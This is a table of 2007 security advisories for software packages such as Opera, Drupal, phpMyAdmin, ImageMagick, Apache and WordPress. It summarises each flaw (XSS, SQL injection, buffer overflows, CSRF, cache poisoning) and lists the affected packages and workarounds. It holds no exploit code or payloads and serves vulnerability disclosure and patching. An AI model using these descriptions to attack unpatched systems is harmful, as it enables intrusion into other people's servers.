| 2007-10-25 | An advisory from Opera reports: If a user has configured Opera to use an external newsgroup client or e-mail application, specially crafted Web pages can cause Opera to run that application incorrectly. In some cases this can lead to execution of arbitrary code. When accessing frames from different Web sites, specially crafted scripts can bypass the same-origin policy, and overwrite functions from those frames. If scripts on the page then run those functions, this can cause the script of the attacker's choice to run in the context of the target Web site. more... | linux-opera opera opera-devel |
| 2007-10-24 | The Drupal Project reports: In some circumstances Drupal allows user-supplied data to become part of response headers. As this user-supplied data is not always properly escaped, this can be exploited by malicious users to execute HTTP response splitting attacks which may lead to a variety of issues, among them cache poisoning, cross-user defacement and injection of arbitrary code. The Drupal installer allows any visitor to provide credentials for a database when the site's own database is not reachable. This allows attackers to run arbitrary code on the site's server. An immediate workaround is the removal of the file install.php in the Drupal root directory. The allowed extension list of the core Upload module contains the extension HTML by default. Such files can be used to execute arbitrary script code in the context of the affected site when a user views the file. Revoking upload permissions or removing the .html extension from the allowed extension list will stop uploads of malicious files, but will do nothing to protect your site against files that are already present. Carefully inspect the file system path for any HTML files. We recommend you remove any HTML file you did not update yourself. You should look for , CSS includes, Javascript includes, and onerror="" attributes if you need to review files individually. The Drupal Forms API protects against cross site request forgeries (CSRF), where a malicious site can cause a user to unintentionally submit a form to a site where he is authenticated. The user deletion form does not follow the standard Forms API submission model and is therefore not protected against this type of attack. A CSRF attack may result in the deletion of users. The publication status of comments is not passed during the hook_comments API operation, causing various modules that rely on the publication status (such as Organic groups, or Subscriptions) to mail out unpublished comments. more... | drupal4 drupal5 |
| 2007-10-23 | Ganael Laplanche reports: Up to now, each ldap* command was called with the -w parameter, which allows to specify the bind password on the command line. Unfortunately, this could make the password appear to anybody performing a `ps` during the call. This is now avoided by using the -y parameter and a password file. more... | ldapscripts |
| 2007-10-23* | RedHat reports: Several flaws were found in the way in which Firefox displayed malformed web content. A web page containing specially-crafted content could potentially trick a user into surrendering sensitive information. (CVE-2007-1095, CVE-2007-3844, CVE-2007-3511, CVE-2007-5334) more... | firefox linux-firefox linux-seamonkey seamonkey |
| 2007-10-20* | SecurityFocus reports: phpMyAdmin is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal potentially sensitive information and launch other attacks. more... | phpMyAdmin |
| 2007-10-16* | phpmyadmin Site reports: It was possible to craft a request that contains XSS by attacking the "table" parameter. more... | phpMyAdmin |
| 2007-10-11 | A Secunia Advisory reports: The vulnerability is caused due to a boundary error within the redir() function in check_http.c when processing HTTP Location: header information. This can be exploited to cause a buffer overflow by returning an overly long string in the "Location:" header to a vulnerable system. more... | nagios-plugins |
| 2007-10-11 | A Secunia Advisory reports: Some vulnerabilities have been reported in libpng, which can be exploited by malicious people to cause a DoS (Denial of Service). Certain errors within libpng, including a logical NOT instead of a bitwise NOT in pngtrtran.c, an error in the 16bit cheap transparency extension, and an incorrect use of sizeof() may be exploited to crash an application using the library. Various out-of-bounds read errors exist within the functions png_handle_pCAL(), png_handle_sCAL(), png_push_read_tEXt(), png_handle_iTXt(), and png_handle_ztXt(), which may be exploited to crash an application using the library. The vulnerability is caused due to an off-by-one error within the ICC profile chunk handling, which potentially can be exploited to crash an application using the library. more... | png |
| 2007-10-10 | Multiple vulnerabilities have been discovered in ImageMagick. ImageMagick before 6.3.5-9 allows context-dependent attackers to cause a denial of service via a crafted image file that triggers (1) an infinite loop in the ReadDCMImage function, related to ReadBlobByte function calls; or (2) an infinite loop in the ReadXCFImage function, related to ReadBlobMSBLong function calls. Multiple integer overflows in ImageMagick before 6.3.5-9 allow context-dependent attackers to execute arbitrary code via a crafted (1) .dcm, (2) .dib, (3) .xbm, (4) .xcf, or (5) .xwd image file, which triggers a heap-based buffer overflow. Off-by-one error in the ReadBlobString function in blob.c in ImageMagick before 6.3.5-9 allows context-dependent attackers to execute arbitrary code via a crafted image file, which triggers the writing of a '\0' character to an out-of-bounds address. Sign extension error in the ReadDIBImage function in ImageMagick before 6.3.5-9 allows context-dependent attackers to execute arbitrary code via a crafted width value in an image file, which triggers an integer overflow and a heap-based buffer overflow. more... | ImageMagick ImageMagick-nox11 |
| 2007-10-10* | The MediaWiki development team reports: A possible HTML/XSS injection vector in the API pretty-printing mode has been found and fixed. The vulnerability may be worked around in an unfixed version by simply disabling the API interface if it is not in use, by adding this to LocalSettings.php: $wgEnableAPI = false; (This is the default setting in 1.8.x.) more... | mediawiki |
| 2007-10-08 | Matthieu Herrb reports: Problem Description: Several vulnerabilities have been identified in xfs, the X font server. The QueryXBitmaps and QueryXExtents protocol requests suffer from lack of validation of their 'length' parameters. Impact: On most modern systems, the font server is accessible only for local clients and runs with reduced privileges, but on some systems it may still be accessible from remote clients and possibly running with root privileges, creating an opportunity for remote privilege escalation. more... | xfs |
| 2007-10-04 | RISE Security reports: There exist multiple vulnerabilities within functions of Firebird Relational Database, which when properly exploited can lead to remote compromise of the vulnerable system. more... | firebird-server |
| 2007-10-02* | The Bugzilla development team reports: Bugzilla::WebService::User::offer_account_by_email does not check the "createemailregexp" parameter, and thus allows users to create accounts who would normally be denied account creation. The "emailregexp" parameter is still checked. If you do not have the SOAP::Lite Perl module installed on your Bugzilla system, your system is not vulnerable (because the Bugzilla WebService will not be enabled). more... | bugzilla |
| 2007-10-01* | Debian Bug report log reports: When tagging file $foo, a temporary copy of the file is created, and for some reason, libid3 doesn't use mkstemp but just creates $foo.XXXXXX literally, without any checking. This would silently truncate and overwrite an existing $foo.XXXXXX. more... | id3lib |
| 2007-09-21 | Alexander Concha reports: While testing WordPress, a SQL Injection vulnerability has been discovered that allows an attacker to retrieve remotely any user credentials from a vulnerable site; this bug is caused by early database escaping and the lack of validation in query string like parameters. more... | de-wordpress wordpress wordpress-mu zh-wordpress |
| 2007-09-21 | A Bugzilla Security Advisory reports: This advisory covers three security issues that have recently been fixed in the Bugzilla code: A possible cross-site scripting (XSS) vulnerability when filing bugs using the guided form. When using email_in.pl, insufficiently escaped data may be passed to sendmail. Users using the WebService interface may access Bugzilla's time-tracking fields even if they normally cannot see them. We strongly advise that 2.20.x and 2.22.x users should upgrade to 2.20.5 and 2.22.3 respectively. 3.0 users, and users of 2.18.x or below, should upgrade to 3.0.1. more... | bugzilla ja-bugzilla |
| 2007-09-21 | BugTraq reports: ClamAV is prone to multiple denial-of-service vulnerabilities. A successful attack may allow an attacker to crash the application and deny service to users. more... | clamav |
| 2007-09-20 | The coppermine development team reports two vulnerabilities with the coppermine application. These vulnerabilities are caused by improper checking of the log variable in "viewlog.php" and improper checking of the referer variable in "mode.php". This could allow local file inclusion, potentially disclosing valuable information and could lead to an attacker conducting a cross site scripting attack against the targeted site. more... | coppermine |
| 2007-09-20 | iDefense reports: Remote exploitation of multiple integer overflow vulnerabilities within OpenOffice, as included in various vendors' operating system distributions, allows attackers to execute arbitrary code. These vulnerabilities exist within the TIFF parsing code of the OpenOffice suite. When parsing the TIFF directory entries for certain tags, the parser uses untrusted values from the file to calculate the amount of memory to allocate. By providing specially crafted values, an integer overflow occurs in this calculation. This results in the allocation of a buffer of insufficient size, which in turn leads to a heap overflow. more... | openoffice |
| 2007-09-19 | The KDE development team reports: The Konqueror address bar is vulnerable to spoofing attacks that are based on embedding white spaces in the URL. In addition the address bar could be tricked to show a URL which it is intending to visit for a short amount of time instead of the current URL. more... | kdebase3 kdelibs3 |
| 2007-09-19 | The KDE development team reports: KDM can be tricked into performing a password-less login even for accounts with a password set under certain circumstances, namely autologin to be configured and "shutdown with password" enabled. more... | kdebase3 |
| 2007-09-19 | The Flyspray Project reports: Flyspray authentication system can be bypassed by sending a carefully crafted post request. To be vulnerable, PHP configuration directive output_buffering has to be disabled or set to a low value. more... | flyspray |
| 2007-09-11 | Apache HTTP server project reports: The following potential security flaws are addressed: CVE-2007-3847: mod_proxy: Prevent reading past the end of a buffer when parsing date-related headers. CVE-2007-1863: mod_cache: Prevent a segmentation fault if attributes are listed in a Cache-Control header without any value. CVE-2007-3304: prefork, worker, event MPMs: Ensure that the parent process cannot be forced to kill processes outside its process group. CVE-2006-5752: mod_status: Fix a possible XSS attack against a site with a public server-status page and ExtendedStatus enabled, for browsers which perform charset "detection". Reported by Stefan Esser. CVE-2006-1862: mod_mem_cache: Copy headers into longer lived storage; header names and values could previously point to cleaned up storage. more... | apache |
| 2007-09-10 | lighttpd maintainer reports: Lighttpd is prone to a header overflow when using the mod_fastcgi extension; this can lead to arbitrary code execution in the fastcgi application. For a detailed description of the bug see the external reference. This bug was found by Mattias Bengtsson and Philip Olausson. more... | lighttpd |
| 2007-09-05 | Gentoo reports: Sune Kloppenborg Jeppesen and Tavis Ormandy of the Gentoo Linux Security Team have reported that the check_update.sh script and the main rkhunter script insecurely create several temporary files with predictable filenames. A local attacker could create symbolic links in the temporary files directory, pointing to a valid file somewhere on the filesystem. When rkhunter or the check_update.sh script runs, this would result in the file being overwritten with the rights of the user running the utility, which could be the root user. more... | rkhunter |
| 2007-09-02 | Matthias Andree reports: fetchmail will generate warning messages in certain circumstances (for instance, when leaving oversized messages on the server or login to the upstream fails) and send them to the local postmaster or the user running it. If this warning message is then refused by the SMTP listener that fetchmail is forwarding the message to, fetchmail crashes and does not collect further messages until it is restarted. more... | fetchmail |
| 2007-09-01 | Red Hat reports: A path traversal flaw was discovered in the way GNU tar extracted archives. A malicious user could create a tar archive that could write to arbitrary files to which the user running GNU tar had write access. Red Hat credits Dmitry V. Levin for reporting the issue. more... | gtar |
| 2007-08-28* | A Secunia Advisory reports: A format string error in the "inc_put_error()" function in src/inc.c when displaying a POP3 server's error response can be exploited via specially crafted POP3 server replies containing format specifiers. Successful exploitation may allow execution of arbitrary code, but requires that the user is tricked into connecting to a malicious POP3 server. more... | claws-mail sylpheed-claws sylpheed2 |
| 2007-08-25* | An advisory from Opera reports: A specially crafted JavaScript can make Opera execute arbitrary code. more... | linux-opera opera opera-devel |
| 2007-08-23* | BugTraq reports: The rsync utility is prone to an off-by-one buffer-overflow vulnerability. This issue is due to a failure of the application to properly bounds-check user-supplied input. Successfully exploiting this issue may allow arbitrary code-execution in the context of the affected utility. more... | rsync |
| 2007-08-16* | Blogsecurity reports: An attacker can read comments on posts that have not been moderated. This can be a real security risk if blog admins are using unmoderated comments (comments that have not been made public) to hide sensitive notes regarding posts, future work, passwords etc. So please be careful if you are one of these blog admins. more... | de-wordpress wordpress zh-wordpress |
| 2007-08-10* | isecpartners reports: flac123, also known as flac-tools, is vulnerable to a buffer overflow in vorbis comment parsing. This allows for the execution of arbitrary code. more... | flac123 |
| 2007-08-02 | A Secunia Advisory reports: fsplib can be exploited to compromise an application using the library. A boundary error exists in the processing of file names in fsp_readdir_native, which can be exploited to cause a stack-based buffer overflow if the defined MAXNAMLEN is bigger than 256. A boundary error exists in the processing of directory entries in fsp_readdir, which can be exploited to cause a stack-based buffer overflow on systems with an insufficient size allocated for the d_name field of directory entries. more... | fsplib |
| 2007-08-02 | A Secunia Advisory reports: joomla can be exploited to conduct session fixation attacks, cross-site scripting attacks or HTTP response splitting attacks. Certain unspecified input passed in com_search, com_content and mod_login is not properly sanitised before being returned to a user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Input passed to the url parameter is not properly sanitised before being returned to the user. This can be exploited to insert arbitrary HTTP headers, which will be included in a response sent to the user, allowing for execution of arbitrary HTML and script code in a user's browser session in context of an affected site. An error exists in the handling of sessions and can be exploited to hijack another user's session by tricking the user into logging in after following a specially crafted link. more... | joomla |
| 2007-08-02 | Problem Description: An un-checked return value in the BGP dissector code can result in an integer overflow. This value is used in subsequent buffer management operations, resulting in a stack based buffer overflow under certain circumstances. Impact: By crafting malicious BGP packets, an attacker could exploit this vulnerability to execute code or crash the tcpdump process on the target system. This code would be executed in the context of the user running tcpdump(1). It should be noted that tcpdump(1) requires privileges in order to open live network interfaces. Workaround: No workaround is available. more... | tcpdump |
| 2007-08-02 | Problem Description: When named(8) is operating as a recursive DNS server or sending NOTIFY requests to slave DNS servers, named(8) uses a predictable query id. Impact: An attacker who can see the query id for some request(s) sent by named(8) is likely to be able to perform DNS cache poisoning by predicting the query id for other request(s). Workaround: No workaround is available. more... | named |
| 2007-08-02* | Problem Description: When writing data into a buffer in the file_printf function, the length of the unused portion of the buffer is not correctly tracked, resulting in a buffer overflow when processing certain files. Impact: An attacker who can cause file(1) to be run on a maliciously constructed input can cause file(1) to crash. It may be possible for such an attacker to execute arbitrary code with the privileges of the user running file(1). The above also applies to any other applications using the libmagic(3) library. Workaround: No workaround is available, but systems where file(1) and other libmagic(3)-using applications are never run on untrusted input are not vulnerable. more... | file |
| 2007-08-01* | Doz reports: Input passed in the URL to index.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | phpSysInfo |
| 2007-07-29 | Securityfocus reports: Mutt is prone to a local buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before using it in a memory copy operation. An attacker can exploit this issue to execute arbitrary code with the privileges of the victim. Failed exploit attempts will result in a denial of service. more... | ja-mutt mutt mutt-lite zh-mutt |
| 2007-07-28 | A Secunia Advisory reports: An error exists in the handling of DNS queries where IDs are incremented with a fixed value and are additionally used for child processes in a forking server. This can be exploited to poison the DNS cache of an application using the module if a valid ID is guessed. An error in the PP implementation within the "dn_expand()" function can be exploited to cause a stack overflow due to an endless loop via a specially crafted DNS packet. more... | p5-Net-DNS |
| 2007-07-28 | The Drupal Project reports: Several parts in Drupal core are not protected against cross site request forgeries due to improper use of the Forms API, or by taking action solely on GET requests. Malicious users are able to delete comments and content revisions and disable menu items by enticing privileged users to visit certain URLs while the victim is logged-in to the targeted site. more... | drupal5 |
| 2007-07-28 | The Drupal Project reports: Some server variables are not escaped consistently. When a malicious user is able to entice a victim to visit a specially crafted link or webpage, arbitrary HTML and script code can be injected and executed in the context of the victim's session on the targeted website. Custom content type names are not escaped consistently. A malicious user with the 'administer content types' permission would be able to inject and execute arbitrary HTML and script code on the website. Revoking the 'administer content types' permission provides an immediate workaround. more... | drupal4 drupal5 |
| 2007-07-27 | A Secunia Advisory reports: A format string error in the "helptags_one()" function in src/ex_cmds.c when running the "helptags" command can be exploited to execute arbitrary code via specially crafted help files. more... | vim vim-lite vim-ruby vim6 vim6-ruby |
| 2007-07-26 | isecpartners reports: libvorbis contains several vulnerabilities allowing heap overwrite, read violations and a function pointer overwrite. These bugs cause at least a denial of service, and potentially code execution. more... | libvorbis |
| 2007-07-24 | The Apache Project reports: The JSP and Servlet included in the sample application within the Tomcat documentation webapp did not escape user provided data before including it in the output. This enabled a XSS attack. These pages have been simplified not to use any user provided data in the output. more... | apache-tomcat jakarta-tomcat tomcat |
| 2007-07-24 | Apache Project reports: The Apache Tomcat team is proud to announce the immediate availability of Tomcat 4.1.36 stable. This build contains numerous library updates, a small number of bug fixes and two important security fixes. more... | apache-tomcat jakarta-tomcat tomcat |
| 2007-07-24 | DokuWiki reports: The spellchecker tests the UTF-8 capabilities of the used browser by sending a UTF-8 string to the backend, which will send it back unfiltered. By comparing string length the spellchecker can work around broken implementations. An attacker could construct a form to let users send JavaScript to the spellchecker backend, resulting in malicious JavaScript being executed in their browser. Affected are all versions up to and including 2007-06-26 even when the spell checker is disabled. more... | dokuwiki dokuwiki-devel |
| 2007-07-21 | Secunia Advisory reports: Some vulnerabilities have been reported in lighttpd, which can be exploited by malicious people to bypass certain security restrictions or cause a DoS (Denial of Service). more... | lighttpd |
| 2007-07-19 | Opera Software ASA reports of multiple security fixes in Opera, including an arbitrary code execution vulnerability: Opera for Linux, FreeBSD, and Solaris has a flaw in the createPattern function that leaves old data that was in the memory before Opera allocated it in the new pattern. The pattern can be read and analyzed by JavaScript, so an attacker can get random samples of the user's memory, which may contain data. Removing a specially crafted torrent from the download manager can crash Opera. The crash is caused by an erroneous memory access. An attacker needs to entice the user to accept the malicious BitTorrent download, and later remove it from Opera's download manager. To inject code, additional means will have to be employed. Users clicking a BitTorrent link and rejecting the download are not affected. data: URLs embed data inside them, instead of linking to an external resource. Opera can mistakenly display the end of a data URL instead of the beginning. This allows an attacker to spoof the URL of a trusted site. Opera's HTTP authentication dialog is displayed when the user enters a Web page that requires a login name and a password. To inform the user which server it was that asked for login credentials, the dialog displays the server name. The user has to see the entire server name. A truncated name can be misleading. Opera's authentication dialog cuts off the long server names at the right hand side, adding an ellipsis (...) to indicate that it has been cut off. The dialog has a predictable size, allowing an attacker to create a server name which will look almost like a trusted site, because the real domain name has been cut off. The three dots at the end will not be obvious to all users. This flaw can be exploited by phishers who can set up custom sub-domains, for example by hosting their own public DNS. more... | linux-opera opera opera-devel |
| 2007-07-18 | Adobe reports: Critical vulnerabilities have been identified in Adobe Flash Player that could allow an attacker who successfully exploits these potential vulnerabilities to take control of the affected system. A malicious SWF must be loaded in Flash Player by the user for an attacker to exploit these potential vulnerabilities. more... | linux-flashplugin |
| 2007-07-09* | Debian reports: Ulf Härnhammar from the Debian Security Audit Project discovered a problem in typespeed, a touch-typist trainer disguised as game. This could lead to a local attacker executing arbitrary code. more... | typespeed |
| 2007-07-07* | wireshark Team reports: It may be possible to make Wireshark or Ethereal crash or use up available memory by injecting a purposefully malformed packet onto the wire or by convincing someone to read a malformed packet trace file. more... | ethereal ethereal-lite tethereal tethereal-lite wireshark wireshark-lite |
| 2007-06-29 | gd has been reported to be affected by several vulnerabilities: CVE-2007-3472: Integer overflow in gdImageCreateTrueColor function in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to have unspecified attack vectors and impact. CVE-2007-3473: The gdImageCreateXbm function in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to cause a denial of service (crash) via unspecified vectors involving a gdImageCreate failure. CVE-2007-3474: Multiple unspecified vulnerabilities in the GIF reader in the GD Graphics Library (libgd) before 2.0.35 allow user-assisted remote attackers to have unspecified attack vectors and impact. CVE-2007-3475: The GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to cause a denial of service (crash) via a GIF image that has no global color map. CVE-2007-3476: Array index error in gd_gif_in.c in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to cause a denial of service (crash and heap corruption) via large color index values in crafted image data, which results in a segmentation fault. CVE-2007-3477: The (a) imagearc and (b) imagefilledarc functions in GD Graphics Library (libgd) before 2.0.35 allow attackers to cause a denial of service (CPU consumption) via a large (1) start or (2) end angle degree value. CVE-2007-3478: Race condition in gdImageStringFTEx (gdft_draw_bitmap) in gdft.c in the GD Graphics Library (libgd) before 2.0.35 allows user-assisted remote attackers to cause a denial of service (crash) via unspecified vectors, possibly involving truetype font (TTF) support. more... | gd |
| 2007-06-28* | Debian project reports: It was discovered that the IMAP code in the Evolution Data Server performs insufficient sanitising of a value later used as an array index, which can lead to the execution of arbitrary code. more... | evolution-data-server |
| 2007-06-27* | Mandriva reports: PerlRun.pm in Apache mod_perl 1.29 and earlier, and RegistryCooker.pm in mod_perl 2.x, does not properly escape PATH_INFO before use in a regular expression, which allows remote attackers to cause a denial of service (resource consumption) via a crafted URI. more... | mod_perl mod_perl2 |
| 2007-06-24* | Secunia reports: Slappter has discovered a vulnerability in WordPress, which can be exploited by malicious users to conduct SQL injection attacks. Input passed to the "wp.suggestCategories" method in xmlrpc.php is not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation allows e.g. retrieving usernames and password hashes, but requires valid user credentials and knowledge of the database table prefix. more... | de-wordpress wordpress zh-wordpress |
| 2007-06-21 | Debian Project reports: Erik Sjolund discovered a buffer overflow in pcdsvgaview, an SVGA PhotoCD viewer. xpcd-svga is part of xpcd and uses svgalib to display graphics on the Linux console for which root permissions are required. A malicious user could overflow a fixed-size buffer and may cause the program to execute arbitrary code with elevated privileges. more... | xpcd |
| 2007-06-19 | ClamAV has been found to have multiple vulnerabilities: Improper checking for the end of a buffer causing an unspecified attack vector. Insecure temporary file handling, which could be exploited to read sensitive information. A flaw in the parser engine which could allow a remote attacker to bypass the scanning of RAR files. A flaw in libclamav/unrar.c which could cause a remote Denial of Service (DoS) by sending a specially crafted RAR file with a modified vm_codesize. A flaw in the OLE2 parser which could cause a remote Denial of Service (DoS). more... | clamav |
| 2007-06-18 | isecpartners reports: VLC is vulnerable to a format string attack in the parsing of Vorbis comments in Ogg Vorbis and Ogg Theora files, CDDA data or SAP/SDP service discovery messages. Additionally, there are two errors in the handling of wav files, one a denial of service due to an uninitialized variable, and one integer overflow in sampling frequency calculations. more... | vlc |
| 2007-06-18 | SpamAssassin website reports: A local user symlink-attack DoS vulnerability in SpamAssassin has been found, affecting versions 3.1.x, 3.2.0, and SVN trunk. more... | p5-Mail-SpamAssassin |
| 2007-06-12 | Secunia reports: CUPS is not using multiple workers to handle connections. This can be exploited to stop CUPS from accepting new connections by starting but never completing an SSL negotiation. more... | cups-base |
| 2007-06-09 | Secunia reports: Input passed to unspecified parameters in pam_login.cgi is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. more... | webmin |
| 2007-06-07 | Mplayer Team reports: A stack overflow was found in the code used to handle cddb queries. When copying the album title and category, no checking was performed on the size of the strings before storing them in a fixed-size array. A malicious entry in the database could trigger a stack overflow in the program, leading to arbitrary code execution with the uid of the user running MPlayer. more... | mplayer mplayer-esound mplayer-gtk mplayer-gtk-esound mplayer-gtk2 mplayer-gtk2-esound |
| 2007-06-05* | Problem Description: Multiple programming errors have been found in gzip which can be triggered when gzip is decompressing files. These errors include insufficient bounds checks in buffer use, a NULL pointer dereference, and a potential infinite loop. Impact: The insufficient bounds checks in buffer use can cause gzip to crash, and may permit the execution of arbitrary code. The NULL pointer dereference can cause gzip to crash. The infinite loop can cause a Denial-of-Service situation where gzip uses all available CPU time. Workaround: No workaround is available. more... | gzip |
| 2007-06-04 | Olivier Dobberkau, Andreas Otto, and Thorsten Kahler report: An unspecified error in the internal form engine can be used for sending arbitrary mail headers, using it for purposes which it is not meant for, e.g. sending spam messages. more... | typo3 |
| 2007-06-04 | SecurityFocus reports about phppgadmin: Exploiting this vulnerability may allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks. more... | phppgadmin |
| 2007-06-01 | James Youngman reports: When GNU locate reads filenames from an old-format locate database, they are read into a fixed-length buffer allocated on the heap. Filenames longer than the 1026-byte buffer can cause a buffer overrun. The overrunning data can be chosen by any person able to control the names of filenames created on the local system. This will normally include all local users, but in many cases also remote users (for example in the case of FTP servers allowing uploads). more... | findutils |
| 2007-05-24 | Integer signedness error in truetype/ttgload.c in Freetype 2.3.4 and earlier might allow remote attackers to execute arbitrary code via a crafted TTF image with a negative n_points value, which leads to an integer overflow and heap-based buffer overflow. more... | freetype2 |
| 2007-05-21 | The SquirrelMail developers report: Multiple cross-site scripting (XSS) vulnerabilities in the HTML filter in SquirrelMail 1.4.0 through 1.4.9a allow remote attackers to inject arbitrary web script or HTML via the (1) data: URI in an HTML e-mail attachment or (2) various non-ASCII character sets that are not properly filtered when viewed with Microsoft Internet Explorer. more... | squirrelmail |
| 2007-05-16 | A Libpng Security Advisory reports: A grayscale PNG image with a malformed (bad CRC) tRNS chunk will crash some libpng applications. This vulnerability could be used to crash a browser when a user tries to view such a malformed PNG file. It is not known whether the vulnerability could be exploited otherwise. more... | png |
| 2007-05-10* | The PHP development team reports: Security Enhancements and Fixes in PHP 5.2.2 and PHP 4.4.7: Fixed CVE-2007-1001, GD wbmp used with invalid image size. Fixed asciiz byte truncation inside mail(). Fixed a bug in mb_parse_str() that can be used to activate register_globals. Fixed unallocated memory access/double free in array_user_key_compare(). Fixed a double free inside session_regenerate_id(). Added missing open_basedir & safe_mode checks to zip:// and bzip:// wrappers. Limit nesting level of input variables with max_input_nesting_level as fix for. Fixed CRLF injection inside ftp_putcmd(). Fixed a possible super-global overwrite inside import_request_variables(). Fixed a remotely trigger-able buffer overflow inside bundled libxmlrpc library. Security Enhancements and Fixes in PHP 5.2.2 only: Fixed a header injection via Subject and To parameters to the mail() function. Fixed wrong length calculation in unserialize S type. Fixed substr_compare and substr_count information leak. Fixed a remotely trigger-able buffer overflow inside make_http_soap_request(). Fixed a buffer overflow inside user_filter_factory_create(). Security Enhancements and Fixes in PHP 4.4.7 only: XSS in phpinfo(). more... | mod_php mod_php4 mod_php4-twig mod_php5 php4 php4-cgi php4-cli php4-dtc php4-horde php4-nms php4-odbc php4-session php4-shmop php4-wddx php5 php5-cgi php5-cli php5-dtc php5-horde php5-imap php5-nms php5-odbc php5-session php5-shmop php5-sqlite php5-wddx |
| 2007-05-02* | The Debian Security Team reports: Several vulnerabilities have been discovered in the QEMU processor emulator, which may lead to the execution of arbitrary code or denial of service. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-1320: Tavis Ormandy discovered that a memory management routine of the Cirrus video driver performs insufficient bounds checking, which might allow the execution of arbitrary code through a heap overflow. CVE-2007-1321: Tavis Ormandy discovered that the NE2000 network driver and the socket code perform insufficient input validation, which might allow the execution of arbitrary code through a heap overflow. CVE-2007-1322: Tavis Ormandy discovered that the "icebp" instruction can be abused to terminate the emulation, resulting in denial of service. CVE-2007-1323: Tavis Ormandy discovered that the NE2000 network driver and the socket code perform insufficient input validation, which might allow the execution of arbitrary code through a heap overflow. CVE-2007-1366: Tavis Ormandy discovered that the "aam" instruction can be abused to crash qemu through a division by zero, resulting in denial of service. more... | qemu qemu-devel |
| 2007-05-02* | Imager 0.56 and all earlier versions with BMP support have a security issue when reading compressed 8-bit per pixel BMP files where either a compressed run of data or a literal run of data overflows the scan-line. Such an overflow causes a buffer overflow in a malloc() allocated memory buffer, possibly corrupting the memory arena headers. The effect depends on your system memory allocator, with glibc this typically results in an abort, but with other memory allocators it may be possible to cause local code execution. more... | p5-Imager |
| 2007-04-23* | Serge Mister and Robert Zuccherato report that the OpenPGP protocol is vulnerable to a cryptographic attack when using symmetric encryption in an automated way. David Shaw reports about the impact: This attack, while very significant from a cryptographic point of view, is not generally effective in the real world. To be specific, unless you have your OpenPGP program set up as part of an automated system to accept encrypted messages, decrypt them, and then provide a response to the submitter, then this does not affect you at all. Note that the fix in GnuPG does not completely eliminate the potential problem: These patches disable a portion of the OpenPGP protocol that the attack is exploiting. This change should not be user visible. With the patch in place, this attack will not work using a public-key encrypted message. It will still work using a passphrase-encrypted message. more... | gnupg p5-Crypt-OpenPGP pgp |
| 2007-04-19 | CVE reports: The APOP protocol allows remote attackers to guess the first 3 characters of a password via man-in-the-middle (MITM) attacks that use crafted message IDs and MD5 collisions. more... | claws-mail |
| 2007-04-19* | The Mozilla Foundation reports of multiple security issues in Firefox, Seamonkey, and Thunderbird. Several of these issues can probably be used to run arbitrary code with the privilege of the user running the program. MFSA 2007-08 onUnload + document.write() memory corruption MFSA 2007-07 Embedded nulls in location.hostname confuse same-domain checks MFSA 2007-06 Mozilla Network Security Services (NSS) SSLv2 buffer overflow MFSA 2007-05 XSS and local file access by opening blocked popups MFSA 2007-04 Spoofing using custom cursor and CSS3 hotspot MFSA 2007-03 Information disclosure through cache collisions MFSA 2007-02 Improvements to help protect against Cross-Site Scripting attacks MFSA 2007-01 Crashes with evidence of memory corruption (rv:1.8.0.10/1.8.1.2) more... | firefox firefox-ja lightning linux-firefox linux-firefox-devel linux-mozilla linux-mozilla-devel linux-seamonkey linux-seamonkey-devel linux-thunderbird mozilla mozilla-thunderbird seamonkey thunderbird |
| 2007-04-14 | Lighttpd SA: Lighttpd caches the rendered string for mtime. The cache key has as a default value 0. At that point the pointer to the string is still NULL. If a file with an mtime of 0 is requested it tries to access the pointer and crashes. The bug requires that a malicious user can either upload files or manipulate the mtime of the files. The bug was reported by cubiq and fixed by Marcus Rueckert. more... | lighttpd |
| 2007-04-14 | Lighttpd SA: If the connection aborts during parsing "\r\n\r\n" the server might get into an infinite loop and use 100% of the CPU time. lighttpd still responds to other requests. This can be repeated until either the server limit for concurrent connections or file descriptors is reached. The bug was reported and fixed by Robert Jakabosky. more... | lighttpd |
| 2007-04-13 | The freeradius development team reports: A malicious 802.1x supplicant could send malformed Diameter format attributes inside of an EAP-TTLS tunnel. The server would reject the authentication request, but would leak one VALUE_PAIR data structure, of approximately 300 bytes. If an attacker performed the attack many times (e.g. thousands or more over a period of minutes to hours), the server could leak megabytes of memory, potentially leading to an "out of memory" condition, and early process exit. more... | freeradius freeradius-mysql |
| 2007-04-13* | JAAScois reports: While processing KML/KMZ data Google Earth fails to verify its size prior to copying it into a fixed-sized buffer. This can be exploited as a buffer-overflow vulnerability to cause the application to crash and/or to execute arbitrary code. more... | google-earth |
| 2007-04-09 | Matthias Andree reports: The POP3 standard, currently RFC-1939, has specified an optional, MD5-based authentication scheme called "APOP" which no longer should be considered secure. Additionally, fetchmail's POP3 client implementation has been validating the APOP challenge too lightly and accepted random garbage as a POP3 server's APOP challenge. This made it easier than necessary for man-in-the-middle attackers to retrieve, by repeated probing and guessing, the first three characters of the APOP secret, bringing brute forcing the remaining characters well within reach. more... | fetchmail |
| 2007-04-08 | CVE reports: Buffer overflow in eject.c in Jason W. Bacon mcweject 0.9 on FreeBSD, and possibly other versions, allows local users to execute arbitrary code via a long command line argument, possibly involving the device name. more... | mcweject |
| 2007-04-08 | Secunia reports: A vulnerability has been discovered in WebCalendar, which can be exploited by malicious people to compromise a vulnerable system. Input passed to unspecified parameters is not properly verified before being used with the "noSet" parameter set. This can be exploited to overwrite certain variables, and allows e.g. the inclusion of arbitrary PHP files from internal or external resources. more... | WebCalendar |
